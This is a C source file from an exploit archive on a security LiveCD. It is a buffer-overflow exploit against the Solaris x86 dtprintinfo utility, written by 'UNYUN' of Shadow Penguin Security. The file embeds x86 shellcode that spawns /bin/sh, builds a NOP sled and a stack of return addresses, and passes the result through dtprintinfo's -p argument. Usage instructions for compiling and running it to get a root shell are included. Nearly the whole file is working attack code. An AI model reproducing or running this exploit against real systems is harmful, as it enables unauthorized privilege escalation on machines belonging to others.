home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / dtprintinfo.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  60 lines

  1. /*=============================================================================
  2.    ex_dtprintinfo.c Overflow Exploits( for Intel x86 Edition)
  3.    The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
  4.    Written by UNYUN (unewn4th@usa.net)
  5.    [usage]
  6.         % setenv DISPLAY=yourdisplay:0.0
  7.         % gcc ex_dtprintinfo.c (This example program)
  8.         % a.out
  9.         #
  10.   =============================================================================
  11. */
  12.  
  13.  
  14. static char   x[1000];
  15.  
  16. #define ADJUST          0
  17. #define STARTADR        621
  18. #define BUFSIZE         900
  19. #define NOP             0x90
  20.  
  21. unsigned long ret_adr;
  22. int     i;
  23.  
  24. char exploit_code[] =
  25.   "\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
  26.   "\x8d\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
  27.   "\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
  28.   "\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
  29.   "\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33"
  30.   "\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88"
  31.   "\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f"
  32.   "\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46"
  33.   "\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01"
  34.   "\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh";
  35.  
  36. unsigned long get_sp(void)
  37. {
  38.   __asm__(" movl %esp,%eax ");
  39. }
  40.  
  41. main()
  42. {
  43.   putenv("LANG=");
  44.   for (i=0;i<BUFSIZE;i++) x[i]=NOP;
  45.  
  46.   for (i=0;i<strlen(exploit_code);i++) x[STARTADR+i]=exploit_code[i];
  47.   ret_adr=get_sp() - 1292 + 148;
  48.  
  49.   for (i = ADJUST; i < 400 ; i+=4)
  50.     {
  51.       x[i+0]=ret_adr & 0xff;
  52.       x[i+1]=(ret_adr >> 8 ) &0xff;
  53.       x[i+2]=(ret_adr >> 16 ) &0xff;
  54.       x[i+3]=(ret_adr >> 24 ) &0xff;
  55.     }
  56.  
  57.   x[BUFSIZE]=0;
  58.   execl("/usr/dt/bin/dtprintinfo", "dtprintinfo", "-p",x,(char *) 0);
  59. }
  60. /*                    www.hack.co.za              [2000]*/